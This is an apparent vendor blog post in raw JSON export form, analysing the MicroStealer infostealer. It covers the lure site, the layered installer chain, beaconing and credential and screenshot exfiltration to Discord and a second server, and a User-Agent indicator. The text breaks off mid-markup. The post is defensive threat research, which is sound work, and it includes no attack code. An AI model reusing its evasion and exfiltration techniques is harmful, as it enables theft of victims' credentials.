{"id":19049,"date":"2026-03-12T09:56:43","date_gmt":"2026-03-12T09:56:43","guid":{"rendered":"\/cybersecurity-blog\/?p=19049"},"modified":"2026-03-25T10:16:50","modified_gmt":"2026-03-25T10:16:50","slug":"microstealer-technical-analysis","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/","title":{"rendered":"MicroStealer\u00a0Analysis: A Fast-Spreading Infostealer with Limited Detection\u00a0"},"content":{"rendered":"\n<p>Security teams depend on early signals to spot and contain new threats. But what happens when a fully capable infostealer spreads while traditional detections stay&nbsp;limited?&nbsp;<\/p>\n\n\n\n<p>In recent investigations, <a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a> researchers observed MicroStealer in 40+ sandbox sessions in less than a month, despite low public visibility. Early activity points to distribution through compromised or impersonated accounts, with education and telecommunications among the affected sectors.<\/p>\n\n\n\n<p>MicroStealer is more than just another stealer. It targets browser credentials, session data, screenshots, and wallet files while using a layered NSIS \u2192 Electron \u2192 Java delivery chain that can slow confident detection.<\/p>\n\n\n\n<p>Let\u2019s break down how MicroStealer operates and how its behavior can be uncovered early in <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s interactive sandbox<\/a>, helping teams shorten time to verdict, reduce unnecessary escalations, and prevent credential theft from becoming a business impact.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Key&nbsp;Takeaways&nbsp;<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>MicroStealer exposes a broader business risk by stealing browser credentials, active sessions, and other sensitive data tied to corporate access.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The malware uses a layered <strong>NSIS \u2192 Electron \u2192 JAR<\/strong> chain that helps it stay unclear longer and slows confident detection.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Distribution through compromised or impersonated accounts makes the initial infection look more trustworthy to victims.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>For&nbsp;enterprises,&nbsp;the&nbsp;main&nbsp;danger&nbsp;is&nbsp;delayed&nbsp;visibility&nbsp;while&nbsp;identity&nbsp;compromise&nbsp;and&nbsp;data&nbsp;theft&nbsp;are&nbsp;already&nbsp;in&nbsp;progress.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">Behavior-based analysis<\/a> is critical for confirming the threat quickly and reducing time to containment.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">The Business Risk&nbsp;Behind&nbsp;MicroStealer&nbsp;<\/h2>\n\n\n\n<p>For&nbsp;security&nbsp;leaders,&nbsp;MicroStealer&nbsp;reflects a threat designed to steal identity data, maintain access, and increase the chance of a wider enterprise incident.&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Corporate identities become exposed: <\/strong>Browser credential theft and session cookie extraction compromise SaaS accounts, internal portals, VPN sessions, and cloud administration access tied to employee browsers.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Privilege expansion becomes possible: <\/strong>Access to authentication tokens, browser sessions, and system credentials creates a path from a single compromised endpoint to privileged accounts and internal systems.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Stealthy access persists longer: <\/strong>Stolen session data allows attackers to operate through valid user sessions, blending malicious activity with legitimate traffic across enterprise services.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Data loss begins immediately: <\/strong>Screenshots, browser data, wallet files, and application artifacts are collected and exfiltrated through multiple channels, ensuring sensitive information leaves the environment quickly.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Attackers gain reconnaissance value: <\/strong>Profiling of Discord and Steam accounts provides intelligence about the victim\u2019s activity, helping attackers prioritize higher-value targets.<\/li>\n<\/ul>\n\n\n\n<p>MicroStealer highlights a familiar enterprise risk: attackers can use stolen identities, stealthy delivery methods, and fast data theft to stay undetected, expand access inside the environment, and increase the risk of operational, compliance, and reputational damage.<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nGain <span class=\"highlight\">earlier visibility\n<\/span>into emerging threats <br><span class=\"highlight\">Reduce the risk<\/span> of corporate credential compromise\n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=Moonrise-rat-analysis&#038;utm_term=240226&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nPower up your SOC\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h2 class=\"wp-block-heading\">Timeline of Observed&nbsp;MicroStealer&nbsp;Activity&nbsp;<\/h2>\n\n\n\n<p>MicroStealer activity was first observed on <strong>December 14<\/strong> during the analysis of the following analysis session inside <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN sandbox<\/a>:<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/d59c90ed-820e-4f3d-be47-77bd997835aa\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">Check analysis session<\/a>&nbsp;&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"555\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-1024x555.png\" alt=\"\" class=\"wp-image-19066\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-1024x555.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-300x163.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-768x416.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-1536x833.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-2048x1110.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-370x201.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-270x146.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-740x401.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>First&nbsp;observed&nbsp;analysis&nbsp;session&nbsp;with MicroStealer<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Over&nbsp;the&nbsp;following&nbsp;period,&nbsp;its&nbsp;activity&nbsp;continued&nbsp;to&nbsp;grow,&nbsp;and&nbsp;at&nbsp;the&nbsp;time&nbsp;of&nbsp;analysis&nbsp;it&nbsp;had&nbsp;already&nbsp;been&nbsp;identified&nbsp;in&nbsp;<strong>more&nbsp;than&nbsp;40&nbsp;sandbox&nbsp;sessions&nbsp;in&nbsp;less&nbsp;than&nbsp;one&nbsp;<\/strong><strong>month<\/strong>,&nbsp;indicating&nbsp;an&nbsp;active&nbsp;distributionphase.&nbsp;<\/p>\n\n\n\n<p>However, despite the malware\u2019s growing popularity, <strong>security vendors are still not detecting MicroStealer<\/strong>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"714\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1024x714.png\" alt=\"Security\u00a0vendors\u00a0don\u2019t\u00a0flag\u00a0the\u00a0file\u00a0as\u00a0malicious\u00a0\" class=\"wp-image-19067\" style=\"width:556px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1024x714.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-300x209.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-768x536.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1536x1071.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-370x258.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-270x188.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-740x516.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee.png 1738w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Security&nbsp;vendors&nbsp;don\u2019t&nbsp;flag&nbsp;the&nbsp;file&nbsp;as&nbsp;malicious<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>The highest concentration of detections was&nbsp;observed&nbsp;between&nbsp;<strong>January 7 and January 11<\/strong>, when&nbsp;<strong>20&nbsp;sandbox sessions&nbsp;<\/strong>containing&nbsp;MicroStealer&nbsp;activity were&nbsp;recorded. This suggests that&nbsp;MicroStealer&nbsp;is gaining traction.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">Catch emerging threats in \n<span class=\"highlight\">under 60 seconds\n<\/span> <br> <span class=\"highlight\">Reduce\u00a0time to verdict <\/span> with clear behavioral evidence\n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/app.any.run\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=microstealer-technical-analysis&#038;utm_term=120326&#038;utm_content=linktoregistration\" rel=\"noopener\" target=\"_blank\">\nRegister now\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>When visiting the malicious&nbsp;resource, the victim is presented with a&nbsp;<strong>visually appealing website:<\/strong>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"573\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-1024x573.png\" alt=\"Attacker-controlled\u00a0website\" class=\"wp-image-19068\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-1024x573.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-300x168.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-768x430.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-1536x860.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-370x207.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-270x151.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-740x414.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1.png 1708w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Attacker-controlled&nbsp;website&nbsp;analyzed&nbsp;inside&nbsp;ANY.RUN&nbsp;sandbox<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>When the \u201cDownload Now\u201d button is clicked, a JavaScript file is executed. It downloads a malicious file from <strong>Dropbox<\/strong> and sends the victim\u2019s <strong>external IP address, region, OS version, and time zone<\/strong> to a Discord server.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"190\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-1024x190.png\" alt=\"\" class=\"wp-image-19072\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-1024x190.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-300x56.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-768x143.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-370x69.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-270x50.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-740x138.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1.png 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"464\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-1024x464.png\" alt=\"\" class=\"wp-image-19073\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-1024x464.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-300x136.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-768x348.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-1536x697.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-370x168.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-270x122.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-740x336.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1.png 1936w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>This basic information serves as a beacon. However, if the downloaded malicious file is executed, MicroStealer steals data from web browser profiles, takes desktop screenshots, and sends the collected data as an archive to two destinations: a <strong>Discord server<\/strong> and a <strong>newly registered exfiltration server<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"483\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-1024x483.png\" alt=\"\" class=\"wp-image-19074\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-1024x483.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-300x142.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-768x362.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-370x175.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-270x127.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-740x349.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1.png 1318w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"521\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-1024x521.png\" alt=\"\" class=\"wp-image-19075\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-1024x521.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-300x153.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-768x391.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-370x188.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-270x137.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-740x376.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec.png 1278w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>In this way, the stealer increases the chances that the stolen data will reach the attacker even if one of the servers becomes unavailable for some reason.<\/p>\n\n\n\n<p>MicroStealer also uses the same name in its User-Agent header during the first GET request to Discord:<\/p>\n\n\n\n<p><strong>User-Agent:<\/strong>&nbsp;MicroStealer\/1.0&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"972\" height=\"220\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged.png\" alt=\"\" class=\"wp-image-19076\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged.png 972w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-300x68.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-768x174.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-370x84.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-270x61.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-740x167.png 740w\" sizes=\"(max-width: 972px) 100vw, 972px\" \/><\/figure>\n\n\n\n<p>In addition to Dropbox, there&nbsp;were&nbsp;also cases where&nbsp;the sample was downloaded from other sources, for example:&nbsp;<a href=\"https:\/\/app.any.run\/tasks\/5ddccf49-dba9-4fb5-bfa6-451c92ebe2a1\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">cdn[.]discordapp[.]com<\/a>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Victimology and Targeting&nbsp;<\/h2>\n\n\n\n<p>Analysis of MicroStealer-related submissions to the <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN sandbox<\/a> shows that <strong>50% of observed sample uploads originated from the United States and Germany<\/strong>, pointing to notable activity in these regions.<\/p>\n\n\n\n<p>Based on the observed cases, the&nbsp;<strong>education<\/strong>&nbsp;and&nbsp;<strong>telecommunications<\/strong>&nbsp;sectors appear to face elevated exposure.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktolookup#{%22query%22:%22threatName:%5C%22microstealer%5C%22%22,%22dateRange%22:180}\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>threatName:&#8221;microstealer&#8221;<\/strong><\/a><strong><\/strong>&nbsp;<\/p>\n\n\n\n<p>The distribution pattern also suggests that threat actors&nbsp;rely on&nbsp;<strong>compromised or impersonated accounts<\/strong>&nbsp;to deliver the malware, increasing the likelihood that victims will trust the source and execute the payload.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nSee if <span class=\"highlight\">emerging threats\n<\/span>are\u00a0targeting your industry and\u00a0region <br>Strengthen <span class=\"highlight\">proactive defense<\/span> with TI\u00a0Lookup\n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=microstealer-technical-analysis&#038;utm_term=120326&#038;utm_content=linktolookup\" rel=\"noopener\" target=\"_blank\">\nStart now\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h2 class=\"wp-block-heading\">Inside the MicroStealer Execution Chain&nbsp;<\/h2>\n\n\n\n<p>The <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN sandbox<\/a> provides a clear overview of the <strong>MicroStealer execution chain<\/strong> and detects the malware\u2019s primary behavioral patterns, making it easier to begin the analysis.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"568\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-1024x568.png\" alt=\"Running\u00a0the\u00a0MicroStealer\u00a0Sample\u00a0in\u00a0ANY.RUN\u00a0\" class=\"wp-image-19084\" style=\"width:650px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-1024x568.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-300x166.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-768x426.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-1536x852.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-2048x1136.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-370x205.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-270x150.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-740x411.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Running&nbsp;the&nbsp;MicroStealer&nbsp;Sample&nbsp;in&nbsp;ANY.RUN<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>To better understand how each component operates, the analysis proceeds with <strong>static analysis<\/strong>. The first stage in the infection chain is <strong>RocobeSetup.exe<\/strong>.<\/p>\n\n\n\n<p>RocobeSetup is an <strong>NSIS installer (Nullsoft Scriptable Install System)<\/strong>, which becomes immediately apparent when analyzing the binary using <strong>Detect It Easy (DIE) <\/strong>(<a href=\"https:\/\/github.com\/horsicq\/Detect-It-Easy\" target=\"_blank\" rel=\"noreferrer noopener\">Detect It Easy<\/a>).<br><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"604\" height=\"155\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-1.jpg\" alt=\"Sample\u00a0Analysis\u00a0in\u00a0Detect\u00a0It Easy\u00a0\" class=\"wp-image-19085\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-1.jpg 604w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-1-300x77.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-1-370x95.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-1-270x69.jpg 270w\" sizes=\"(max-width: 604px) 100vw, 604px\" \/><figcaption class=\"wp-element-caption\"><em>Sample&nbsp;analysis&nbsp;in&nbsp;Detect&nbsp;It Easy<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Since the installer has an archive structure, its contents can be inspected without executing the malware or using specialized analysis tools.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"368\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3.jpg\" alt=\"Analysis\u00a0of\u00a0the\u00a0NSIS\u00a0Installer\u00a0Contents\u00a0\" class=\"wp-image-19086\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3.jpg 960w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-300x115.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-768x294.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-370x142.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-270x104.jpg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-740x284.jpg 740w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><figcaption 